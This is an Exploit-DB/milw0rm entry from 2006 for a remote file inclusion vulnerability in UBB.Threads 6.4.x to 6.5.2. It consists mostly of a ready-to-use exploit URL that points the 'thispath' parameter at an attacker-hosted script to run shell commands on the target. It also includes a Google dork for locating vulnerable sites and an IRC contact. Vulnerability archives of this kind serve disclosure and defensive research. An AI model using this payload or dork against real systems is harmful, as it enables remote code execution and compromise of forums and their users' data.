UBBCentral UBB.Threads 6.4.x < 6.5.2 - 'thispath' Remote File Inclusion

EDB-ID:

1814

Author:

V4mu

Type:

webapps

Platform:

PHP

Published:

2006-05-22

Anomaly 1n The System presents
UBB.threads >= 6.4.x Remote File Inclusion
 
founded by V4mu in 04/20/2006

URL: http://www.ubbcentral.com
Google dork: allinurl:"/ubbthreads/"

exploit:
/addpost_newpoll.php?addpoll=preview&thispath=http://[attacker]/cmd.gif?&cmd=id
 
contact: irc.gigachat.net #A1TS

# milw0rm.com [2006-05-22]